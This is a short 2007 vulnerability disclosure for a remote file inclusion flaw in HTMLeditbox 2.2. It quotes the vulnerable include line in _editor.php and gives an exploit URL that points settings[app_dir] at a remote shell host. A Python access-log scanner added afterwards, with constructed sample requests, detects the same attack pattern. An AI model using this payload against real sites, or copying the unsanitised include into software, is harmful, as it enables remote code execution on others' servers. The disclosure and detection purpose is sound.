HTMLeditbox & 2.2 >> RFI Apr 25 2007 10:52AM
alijsb yahoo com
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
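
Added example, not part of the original post: a small access-log check a defender can run to spot requests that try to override `settings[app_dir]` (or any other `settings[...]` element, which goes slightly beyond the single parameter reported). It assumes a common/combined-format web server log; the sample log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names that overwrite an application array element, e.g. settings[app_dir]
ARRAY_PARAM = re.compile(r"^settings\[[^\]]*\]$", re.I)
# Values that make include() read through a stream wrapper instead of the local disk
REMOTE_VALUE = re.compile(r"^\s*(https?|ftps?|php|data)(://|:)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_request(target):
    """Return a list of (param, value, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        if ARRAY_PARAM.match(name):
            reason = "remote include value" if REMOTE_VALUE.match(value) else "settings[] override"
            findings.append((name, value, reason))
    return findings

def scan(log_lines):
    """Yield (line_number, finding) for each suspicious request in an access log."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            for finding in inspect_request(match.group(1)):
                yield number, finding

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2007:10:52:01 +0000] "GET /_editor.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Apr/2007:10:53:17 +0000] "GET /_editor.php?settings[app_dir]=http://remote.example HTTP/1.1" 200 312',
    '192.0.2.44 - - [25/Apr/2007:10:53:40 +0000] "GET /_editor.php?settings%5Bapp_dir%5D=%2568ttp%3A%2F%2Fremote.example HTTP/1.1" 200 312',
    '192.0.2.61 - - [25/Apr/2007:10:54:02 +0000] "GET /_editor.php?settings[app_dir]=/tmp HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    for number, (name, value, reason) in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}: {name}={value}")
```

Any hit on a `settings[...]` request parameter is worth reviewing, since the application's configuration array should never be supplied by the client.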
